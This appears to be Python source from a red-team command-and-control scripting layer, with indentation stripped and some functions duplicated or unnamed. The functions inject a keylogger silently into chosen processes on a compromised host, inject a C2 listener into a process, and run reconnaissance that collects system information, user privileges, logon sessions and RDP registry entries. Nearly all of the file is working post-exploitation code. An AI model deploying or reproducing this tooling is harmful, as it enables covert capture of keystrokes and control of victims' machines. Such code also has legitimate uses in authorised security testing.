def _(bid, *proc_names):
if not proc_names:
# defaults
proc_names = default_procs
def parsed_callback(procs):
found = None
for search in proc_names:
for proc in procs:
if search == proc['name'] and 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid, 'Keylogging process {} ({} {})'.format(
proc['name'], proc['pid'], proc['arch']))
aggressor.bkeylogger(bid,
proc['pid'],
proc['arch'],
silent=True)
return
# nothing found
aggressor.berror(bid, "Didn't find any processes to inject keylogger")
def ps_callback(bid, content):
procs = helpers.parse_ps(content)
parsed_callback(procs)
aggressor.btask(
bid, 'Tasked beacon to keylog first accessible process named: ' +
', '.join(proc_names))
aggressor.bps(bid, ps_callback)
def _(bid):
def ps_callback(bid, content):
procs = helpers.parse_ps(content)
def get_children(pid):
ret = []
for proc in procs:
if proc['ppid'] == pid and proc['pid'] != pid:
ret.append(proc)
return ret
def get_trunks(procs):
all_pids = [proc['pid'] for proc in procs]
ret = []
for proc in procs:
if proc['ppid'] not in all_pids or proc['ppid'] == proc['pid']:
ret.append(proc)
return ret
def make_tree(proc, indent=0):
# output proc info
output = ''
output += ' ' * indent + '{} (pid {})'.format(
proc['name'], proc['pid'])
if 'arch' in proc:
output += ' (arch {})'.format(proc['arch'])
if 'user' in proc:
output += ' (user {})'.format(proc['user'])
# add app description
exe = proc['name'].lower()
output += '\n'
# recurse children
children = get_children(proc['pid'])
#aggressor.blog2(bid, 'recursing {} children of {}'.format(len(children), str(proc)))
#aggressor.blog2(bid, str(children))
for child in children:
output += make_tree(child, indent + 4)
return output
# start with process 0
tree = ''
for trunk in get_trunks(procs):
tree += make_tree(trunk)
aggressor.blog2(bid, 'Process tree:\n' + tree)
aggressor.btask(bid, 'Tasked beacon to make a process tree')
aggressor.bps(bid, ps_callback)
def find_process(bid, proc_name, callback):
"""
Find processes by name. Call callback with results.
:param bid: Beacon to use
:param proc_name: Process name to search for
:param callback: Callback for results. Syntax is `callback(procs)` where
`procs` is the output of `parse_ps`.
"""
def ps_callback(bid, content):
procs = parse_ps(content)
ret = filter(lambda p: p['name'] == proc_name, procs)
callback(ret)
aggressor.bps(bid, ps_callback)
def _(bid, listener=None, *proc_names):
if not proc_names:
# defaults
proc_names = default_procs
if not listener:
# select default listener
listener = helpers.default_listener()
if listener not in aggressor.listeners():
# listener not recognized
aggressor.berror(bid, 'Unknown listener: {}'.format(listener))
return
def parsed_callback(procs):
found = None
for search in proc_names:
for proc in procs:
if search == proc['name'] and 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid,
'Injecting listener {} into process {} ({} {})'.format(
listener, proc['name'], proc['pid'], proc['arch']))
aggressor.binject(bid, proc['pid'], listener, proc['arch'])
return
# nothing found
aggressor.berror(
bid,
"Didn't find any processes to inject listener {}".format(listener))
def ps_callback(bid, content):
procs = helpers.parse_ps(content)
parsed_callback(procs)
aggressor.btask(
bid,
'Tasked beacon to inject listener {} into first accessible process named: {}'
.format(listener, ', '.join(proc_names)))
aggressor.bps(bid, ps_callback)
def _(bid):
command = textwrap.dedent("""
echo "--- Host ---"
systeminfo
echo "--- User ---"
whoami /all
echo "Domain: $env:logonserver"
echo "Home: $env:userprofile"
echo "--- Other ---"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>$null
echo "--- Location ---"
pwd
""")
aggressor.bps(bid)
aggressor.bnet(bid, 'logons')
aggressor.bnet(bid, 'sessions')
aggressor.bpowerpick(bid, command)
def find_process(bid, proc_name, callback):
"""
Find processes by name. Call callback with results.
:param bid: Beacon to use
:param proc_name: Process name(s) to search for. Can be a list of names or
a single name.
:param callback: Callback for results. Syntax is `callback(procs)` where
`procs` is the output of `parse_ps`.
"""
if isinstance(proc_name, list):
# already a list
proc_names = proc_name
else:
# make it a list
proc_names = [proc_name]
def ps_callback(bid, content):
procs = parse_ps(content)
ret = filter(lambda p: p['name'] in proc_names, procs)
callback(ret)
aggressor.bps(bid, ps_callback)
def _(bid, proc_name=None):
def parsed_callback(procs):
for proc in procs:
if 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid, 'Keylogging process {} ({} {})'.format(
proc['name'], proc['pid'], proc['arch']))
aggressor.bkeylogger(bid,
proc['pid'],
proc['arch'],
silent=True)
return
# nothing found
if proc_name:
aggressor.berror(
"Didn't find any processes named '{}' to inject keylogger".
format(proc_name))
else:
aggressor.berror("Didn't find any processes to inject keylogger")
def ps_callback(bid, content):
procs = helpers.parse_ps(content)
parsed_callback(procs)
if proc_name:
aggressor.blog2(
bid,
'Tasked beacon to keylog first accessible process named {}'.format(
proc_name))
helpers.find_process(bid, proc_name, parsed_callback)
else:
aggressor.btask(bid,
'Tasked beacon to keylog first accessible process')
aggressor.bps(bid, ps_callback)
def _(bid):
aggressor.bps(bid)
import_host_recon(bid)
aggressor.bpowerpick(bid, 'Invoke-BasicRecon')
